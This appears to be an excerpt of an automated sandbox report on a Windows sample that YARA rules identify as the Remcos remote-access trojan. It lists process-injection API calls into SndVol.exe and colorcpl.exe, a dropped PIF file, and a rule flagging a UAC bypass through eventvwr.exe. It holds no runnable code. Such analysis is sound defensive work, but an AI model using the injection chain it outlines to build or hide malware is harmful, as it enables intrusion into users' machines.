Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EC8D72 GetThreadContext,SetThreadContext,NtResumeThread,	0_2_02EC8D72
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048FC0DC NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	9_2_048FC0DC
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Code function: 11_2_02F4B11C NtOpenProcess,NtCreateThreadEx,	11_2_02F4B11C
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Code function: 11_2_02F47A3C NtAllocateVirtualMemory,	11_2_02F47A3C
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Code function: 11_2_02F47D88 NtWriteVirtualMemory,	11_2_02F47D88
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Code function: 11_2_02F4DD74 NtOpenFile,NtReadFile,	11_2_02F4DD74
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Code function: 11_2_02F484D8 NtProtectVirtualMemory,	11_2_02F484D8
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Code function: 11_2_02F47AD9 NtAllocateVirtualMemory,	11_2_02F47AD9
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Code function: 11_2_02F47A3A NtAllocateVirtualMemory,	11_2_02F47A3A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D4C0DC NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	13_2_06D4C0DC

Source: C:\Users\user\Desktop\1m181Ru74o.exe

Code function: 0_2_02ECF7CC InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

0_2_02ECF7CC

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,	9_2_00414DB4
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048F5B4C ExitWindowsEx,LoadLibraryA,GetProcAddress,	9_2_048F5B4C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,	13_2_00414DB4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D45B4C ExitWindowsEx,LoadLibraryA,GetProcAddress,	13_2_06D45B4C

Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EB20C4	0_2_02EB20C4
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00425152	9_2_00425152
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00435286	9_2_00435286
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_004513D4	9_2_004513D4
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0045050B	9_2_0045050B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00436510	9_2_00436510
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_004316FB	9_2_004316FB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0043569E	9_2_0043569E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00443700	9_2_00443700
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_004257FB	9_2_004257FB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_004128E3	9_2_004128E3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00425964	9_2_00425964
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0041B917	9_2_0041B917
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0043D9CC	9_2_0043D9CC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00435AD3	9_2_00435AD3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00424BC3	9_2_00424BC3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0043DBFB	9_2_0043DBFB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0044ABA9	9_2_0044ABA9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00433C0B	9_2_00433C0B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00434D8A	9_2_00434D8A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0043DE2A	9_2_0043DE2A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0041CEAF	9_2_0041CEAF
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00435F08	9_2_00435F08
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_04912493	9_2_04912493
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_04924498	9_2_04924498
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_04916436	9_2_04916436
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_04906593	9_2_04906593
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048FC6AF	9_2_048FC6AF
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_049066FC	9_2_049066FC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048F367B	9_2_048F367B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0491E764	9_2_0491E764
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0491601E	9_2_0491601E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0493216C	9_2_0493216C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_049312A3	9_2_049312A3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_049172A8	9_2_049172A8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_04916CA0	9_2_04916CA0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048FDC47	9_2_048FDC47
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_04905EEA	9_2_04905EEA
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0491686B	9_2_0491686B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0491E993	9_2_0491E993
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_049149A3	9_2_049149A3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0490595B	9_2_0490595B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0492B941	9_2_0492B941
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0491EBC2	9_2_0491EBC2
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_04915B22	9_2_04915B22
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Code function: 11_2_02F320C4	11_2_02F320C4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00425152	13_2_00425152
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00435286	13_2_00435286
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_004513D4	13_2_004513D4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0045050B	13_2_0045050B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00436510	13_2_00436510
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_004316FB	13_2_004316FB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0043569E	13_2_0043569E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00443700	13_2_00443700
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_004257FB	13_2_004257FB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_004128E3	13_2_004128E3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00425964	13_2_00425964
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0041B917	13_2_0041B917
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0043D9CC	13_2_0043D9CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00435AD3	13_2_00435AD3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00424BC3	13_2_00424BC3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0043DBFB	13_2_0043DBFB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0044ABA9	13_2_0044ABA9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00433C0B	13_2_00433C0B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00434D8A	13_2_00434D8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0043DE2A	13_2_0043DE2A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0041CEAF	13_2_0041CEAF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00435F08	13_2_00435F08
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D566FC	13_2_06D566FC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D4C6AF	13_2_06D4C6AF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D4367B	13_2_06D4367B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D6E764	13_2_06D6E764
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D62493	13_2_06D62493
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D74498	13_2_06D74498
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D66436	13_2_06D66436
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D56593	13_2_06D56593
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D812A3	13_2_06D812A3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D672A8	13_2_06D672A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D6601E	13_2_06D6601E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D8216C	13_2_06D8216C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D55EEA	13_2_06D55EEA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D66CA0	13_2_06D66CA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D4DC47	13_2_06D4DC47
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D6EBC2	13_2_06D6EBC2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D65B22	13_2_06D65B22
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D6686B	13_2_06D6686B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D6E993	13_2_06D6E993
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D649A3	13_2_06D649A3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D5595B	13_2_06D5595B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D7B941	13_2_06D7B941

Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Code function: String function: 02F4895C appears 50 times
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Code function: String function: 02F34860 appears 683 times
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Code function: String function: 02F346D4 appears 155 times
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: String function: 02EB44DC appears 74 times
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: String function: 02EC895C appears 56 times
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: String function: 02EB4500 appears 33 times
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: String function: 02EB4860 appears 949 times
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: String function: 02EB46D4 appears 244 times
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: String function: 02EC89E0 appears 45 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 00402073 appears 51 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 00432525 appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 06D63928 appears 53 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 06D632BD appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 00432B90 appears 53 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 04913928 appears 53 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 00402073 appears 51 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 00432525 appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 049132BD appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 00432B90 appears 53 times

Source: 1m181Ru74o.exe	Binary or memory string: OriginalFilename vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1296625632.000000007FC5F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1399478941.0000000015B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1296854371.000000000290C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000002.1425448990.00000000022C5000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000002.1425970905.0000000002904000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1399478941.0000000015B42000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D37000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000002.1460211820.000000007FA30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1296854371.0000000002908000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1297153626.000000007F8EF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1297153626.000000007F8EF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000002.1425970905.0000000002908000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 1m181Ru74o.exe
Source: 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D7E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe

Source: 1m181Ru74o.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
